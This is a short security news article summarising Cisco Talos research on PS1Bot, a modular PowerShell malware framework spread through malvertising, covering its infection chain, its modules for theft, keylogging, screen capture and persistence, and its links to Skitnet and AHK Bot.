An ongoing malware campaign active throughout 2025 is using malvertising to deliver a sophisticated PowerShell-based framework.
According to Cisco Talos researchers, the malware is named “PS1Bot” due to its similarities with the AHK Bot malware family. It deploys multiple malicious modules capable of stealing sensitive information, logging keystrokes, capturing screens and maintaining persistence.
The infection chain begins when victims download a compressed archive from a malicious advertisement or search engine optimization (SEO) poisoning link.
The archive contains a JavaScript file, “FULL DOCUMENT.js,” embedded with VBScript. Once executed, it retrieves a PowerShell script that polls a command-and-control (C2) server for further modules. These are executed in memory, reducing forensic traces.
Read more on malware leveraging malvertising for distribution: NCSC Publishes Tips to Tackle Malvertising Threat
Talos has identified distinct modules performing:
-
Antivirus detection
-
Screen capture
-
Cryptocurrency wallet and browser data theft
-
Keylogging and clipboard monitoring
-
System information gathering
-
Persistence
Each module reports status updates to the attacker via HTTP requests.
Notably, the “grabber” module targets dozens of web browsers and cryptocurrency wallet extensions, searching local drives for files containing wallet seed phrases or passwords before compressing and exfiltrating them.
The screen capture tool compiles and runs C# code at runtime to generate JPEG screenshots, which are later encoded and sent to the C2 server. The keylogger uses Windows API hooks to capture keystrokes and mouse events, alongside clipboard contents. Persistence is achieved by creating PowerShell scripts and shortcuts that reinitiate the C2 loop on system startup.
While Talos has not observed the Skitnet binary directly, overlaps in infrastructure, module design and URL construction suggest links to campaigns distributing Skitnet/Bossnet.
The researchers also note architectural similarities to AHK Bot, including using drive serial numbers to build C2 paths and a modular design enabling rapid updates.
Talos has assessed that additional, undiscovered PS1Bot modules likely exist. The malware’s flexible framework and active development indicate it will continue evolving as attackers adapt its capabilities.
No tags.
